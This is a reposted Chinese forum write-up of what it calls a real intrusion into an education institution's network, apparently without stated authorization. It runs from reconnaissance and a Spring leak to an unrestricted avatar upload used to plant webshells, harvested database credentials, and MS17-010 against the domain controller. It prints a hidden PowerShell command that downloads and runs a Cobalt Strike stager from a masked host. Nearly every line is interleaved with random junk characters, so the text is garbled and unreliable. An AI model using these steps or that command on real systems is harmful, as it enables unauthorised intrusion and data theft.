|
9 X* t+ v# b7 \$ [, ]( ^8 X 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
5 X3 {% w2 h% X2 f # Q& G# ?5 X; B2 f- S [& n+ X/ s
* K! N& h. B* D7 Z2 K* Q8 V
# A# x" I5 K7 e$ {% u* f' f
# r+ }* H' |# z2 e3 `; g& x+ J& L2 l
正文
! a0 O# z+ A$ i. ^! c6 v
: [* @7 f2 A- [
, B3 k% k2 s, k+ y& S
0 [! R- N$ |! ]' R: ^. y6 V 5 X) V( }0 Y9 s# U0 [
" |& f9 J" b5 C# z' d' {4 q4 \
目标:www.xxxx.com(一家教育机构)
/ F4 q; F$ Q8 u2 f) a, s8 V打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能0 E2 n6 Q A: m B1 s
* |( l9 t# `4 w+ }
5 X9 q' q- ?. ^ ~" C. H" S  3 }$ o' d8 W/ e: p9 i' Y R/ [
' W4 r6 h P8 l# {" n- b+ K4 R& g4 L {# v* U- V6 n# e
进行了简单的信息搜集
* B5 v- S4 N5 T% ~
* j+ T4 y' C C8 D {, E8 i2 _0 I7 h- J
; ~' G3 ?0 Q: l9 l2 `
# B! p+ @4 W8 o& `/ r% j! B
子域名搜集. c: e7 @; s* Y4 T! B2 M
' f% J. m7 v2 C! e( y# {
8 k8 }, }% ^9 p) D2 [: h  # p5 v9 ?5 \5 G* P8 q
- R" E" ^' W! N" K0 t! Y7 Q
: d: ?0 K4 q1 c" z1 f1 Z fofa找资产
. D- d# i3 l+ s/ j3 K0 Y- p3 d
$ I4 Q4 R x% ?8 J# Y+ t3 Y1 m
@' b" L8 p1 E7 G. `5 f 8 j$ F( H" M& V* U/ J8 L6 A7 s
& O7 y* i( L, ^# _; ^' N9 l# P
% H9 I7 ]. K( Y+ Y2 E& X 0 J* }1 v9 o( X( t) k. C; M
0 o5 S' t. n9 A s
一共七个资产。去重之后只有两个。
0 h5 H2 ^" c; U5 z4 w
. @$ ?( R5 S2 X* U* Y! z; u5 U" U" I
" f* X% _$ S+ B5 g0 K
, H8 p3 q5 f' D' O: w
目录探测
) a4 u( G! a e5 P/ j& ^3 t# _ 3 V" R$ _ L9 t+ B8 N7 _' k
; x+ ]( T! A9 Q6 s7 W" C7 e7 P
 + c* C6 o S' Z& X
) E7 X) x8 o3 X5 m2 d+ b; y v# C
& d& _. A6 G5 k! H, c
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
( v; `) q! V) A5 G+ Q; ]
' p% k/ I: g0 l& k0 Y- Q$ z
7 l1 {# n X; a% j9 [! E2 f
4 t6 @4 M {, f2 [- @/ \! c; y. h( W0 x. ?, C; H* G. U3 f J
我又尝试了通过修改返回包来绕过登录界面2 E5 v: T3 \" \% D- I
; R+ j4 e( d$ d! [
+ m+ m" C! ?1 h0 e
 . F6 z* E9 n0 @$ R
3 x! g J2 c1 \1 {6 j$ L: A
1 ]5 X( }2 S) R5 h 还是不行,尝试注入无果
& A: j F! t4 }1 s/ t. z R) | 5 U6 `# y! t+ |, k9 E2 M
/ S9 v! z* f* l 
( k- G9 K0 [" l; i1 Y . A: v1 O* [/ i+ Z }( I& }
2 m+ `! d/ h2 n2 ]
不过我目录探测出了一处Spring信息泄露
" l) J* g3 B. w$ d* _
6 K. \4 B5 B) W/ @+ b: [1 h# s! |: o3 f; e0 |( T7 C
. G b, E& m0 s9 u c% c8 W
% Q4 R; g0 P% r/ R/ h$ a) F
 - n9 d! H# [1 V+ O; C- j' A2 S
q" b: T" q& }- [- Q
, m# t' y6 I9 Q+ I6 } 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录" w: O6 z/ q( L
1 g$ `/ q- F B K* D; D
6 {0 j1 b3 ~9 Y 
% E5 f" _# S- C ?$ W- n 5 s& l3 |3 w5 k' G
; r8 }, ^' ~6 @" D* N1 r, e
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。" y* |1 w& X L1 V
( D, l) W: V9 s- G! ~
3 W0 _( Q! r1 L3 m  0 y7 p! n3 ~6 Y+ P
" ^' J7 b2 D6 R, b
$ t: t/ V C: r! G0 a& O5 D5 a 获取有些师傅到这一步就手机抓包电脑测了。
- e1 a2 y4 Q: B* z# } r, r } d0 f6 a# e- Q
4 g9 \" N* E) |7 P" @5 B! ]2 J, i
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
8 c$ R% u/ S6 z" B- y. p3 y
' x" |( V5 ?; h O/ w7 d$ G6 G R6 X0 a7 @* V- ~2 {, a P
其中在一个公众号发现了小程序,可以进行注册。$ T4 Y0 O/ |6 u, _3 ~; ~2 I
' L* k5 k# l) W1 K3 k: }* C
7 o- A' L) S. h% C4 r- s
看到了头像上传,尝试上传获取WebShell
7 V8 Z' K/ U( r 2 D' B# v% |% t& a8 ]7 K; G1 [
# ]# W/ I& N0 H* g9 s8 R 
& H. Z! W4 z1 O* q ! d4 J7 S: |8 a6 V, c
2 L: l4 n. T) ?8 S- M
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 ]: F9 O( K d2 H5 ^: r1 X" b) I
7 _* {1 |* w# u
! N& s; J2 g. M& X9 q2 n$ Z
 # B; z& r: u# ^7 [: v+ K* n
7 h* Z- y# X3 v% V9 X' R9 E) a* q; P1 D8 V( _0 U( M; k2 }8 C
然后上了大马
4 c) G5 h& B ~
0 S5 ?4 N5 [ h. k- `& P& u7 K- g
 % }$ y( A5 T- P* T# p l
A% w. t$ Y H) u9 F1 O4 V( a: q. J: a- F5 f( t7 O
- b5 \+ w) Y8 _& C/ D9 y" ?' u 8 f7 L# o6 |7 _# f2 F5 d; g
& P) f: w, i9 n" Q$ J. A' Y
通过翻找文件发现数据库账号密码4 ~- c# ^4 w/ ^9 b8 A
& [2 R+ G# M4 V* a# Y& p+ W3 J7 m5 m, p- R3 D$ Z
 : ~8 d" V! `$ T1 }
( l! |2 o) @- O* {8 d ?4 }- F* F
--内网渗透; t. V+ d3 ^0 r8 W7 q
- p/ b2 a! ~' l- ^( H
0 x1 f/ L* `- H 直接通过powershell执行 cs上线' X- g% y; S$ a& [5 ~5 ^0 e
# Q* H2 N. c) U6 q
5 E2 T0 h5 N' @; {" ~ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"! a, h! N/ P) [# x& C
& E) U5 R0 |, K4 @. k- Y
7 b' C3 R1 r6 M7 j) {2 \ 
) w6 W/ e! m: h: F* n; l - R8 T. O& a- ^. `! T
- }/ |: v' J& |4 g4 v5 ` 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
: J* P% Z' @. k" R ' r g/ h% F4 L2 Y1 T
- N; U [* k- R) R, b  1 S0 U! n! `2 F8 y( ]& Z# }8 y# i
6 i6 ^+ {$ n8 z" G" a) M" I
9 V! }/ X! D9 w
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ N9 W& Q; ^# g8 c) s
, J6 @8 M* h7 u
* G" ~+ i7 ^; S* u7 o; a" {
. j! u$ u) v" S6 R; o+ H! V
, i" D" G. m4 f* V& E/ h
' d6 T1 _% e( V# T  5 \- K$ {7 r# Z; A
$ v/ W1 a+ P& }; f/ p) r" d% G3 s+ K7 o
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
1 z* [6 d1 s$ E$ ^& y5 W
1 a9 o3 t, V7 W
5 w& b5 l. o& z, ~( _5 B2 }+ A . I# M, U9 ^7 `9 F
% z; V: c% z! R
 1 z" t/ x8 A, H' n# S: a
. o8 i! A5 V1 a# w: l9 d
; C$ `( m6 X8 J8 ~: U/ g
7 G" W. u5 s/ w$ \& z0 V4 ?
' p4 `' ]* Z5 O1 J' \
" N+ f/ ?; I7 n) a. G 1 B% c; b& Q; M$ s. d
/ v! F& P3 f* f / i( X1 g2 Q0 @) T( ^- X0 ?
3 |+ h$ {2 E( `
q, E& M/ U( T& B2 z 小结7 }6 s; C: J% s1 C
0 D9 s# [: Q& X/ k* n2 J/ D4 \% M' p2 @% F( b
8 h4 K4 {/ W5 D ^0 T1 k. H
1 }3 Z' F. f4 N
; _+ R, h6 A+ g: w# ^! T2 q$ Y. T 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
' d; O: [- Q% H% r+ ]4 L ( i4 ^: D. v) I) M4 u
8 { R8 i% m* T9 c4 g. ?
5 T2 @. u7 j! D: `' _ : F7 ~, w% s: Y; P6 Q) t
' {+ t- d1 y1 q
- , C6 X* K7 L4 Q1 ~6 ]: m
& V& T5 Z8 A# h+ @
. `+ t% Z! R" y9 F R6 d
- % i Z- j' s O. A9 o# m/ A3 K
/ W+ B! m& P2 `
; _4 H, C3 @9 `+ v3 k( _) Z
9 l$ o$ |1 S' h/ s$ M/ I. Z1 o9 K2 _$ H, D0 s1 }! {, o8 r
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html9 f: R6 S% \6 o1 F* Z9 L6 d
' m) \& _7 p4 j5 ]
! N' f7 x0 I V0 [& f" `7 O . u# n5 F8 y7 A8 D
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对